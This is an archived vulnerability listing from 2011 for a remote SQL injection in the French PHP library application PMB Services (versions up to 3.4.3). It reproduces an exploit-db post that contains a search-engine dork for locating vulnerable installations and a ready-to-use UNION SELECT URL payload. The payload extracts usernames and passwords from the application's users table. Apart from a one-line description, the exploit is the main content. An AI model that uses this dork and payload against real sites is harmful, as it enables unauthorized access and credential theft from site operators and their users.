PMB Services <= 3.4.3 SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-02-04T00:00:00
ID MYHACK58:62201128980
Type myhack58
Reporter 佚名
Modified 2011-02-04T00:00:00

Description

PMB Services is a France php web application, PMB Services <=3.4.3 of the index. php existssql injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~

Exploit Title: [ PMB Services <= 3.4.3 Remote SQL Injection ]

Author : Luchador

Date : 29-01-2011

Location : Algeria

Site : http://vbspiders.com

Critical Lvl : Dangerous

Mail: nourie. tlm[at]gmail.com

[+]poc: ~~~~~~~~~ - Remote SQL Injection

dork : inurl:opac_css or inurl:index. php? lvl=coll_see&id=

Exploit:

~~~~~~~~~ http://www.target.com[path pmb]/index. php? lvl=coll_see&id=-1//union//select+1,2,3,unhex(hex(group_CONCAT(username,0x3a,pwd))),5,6,7+from+users--

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16087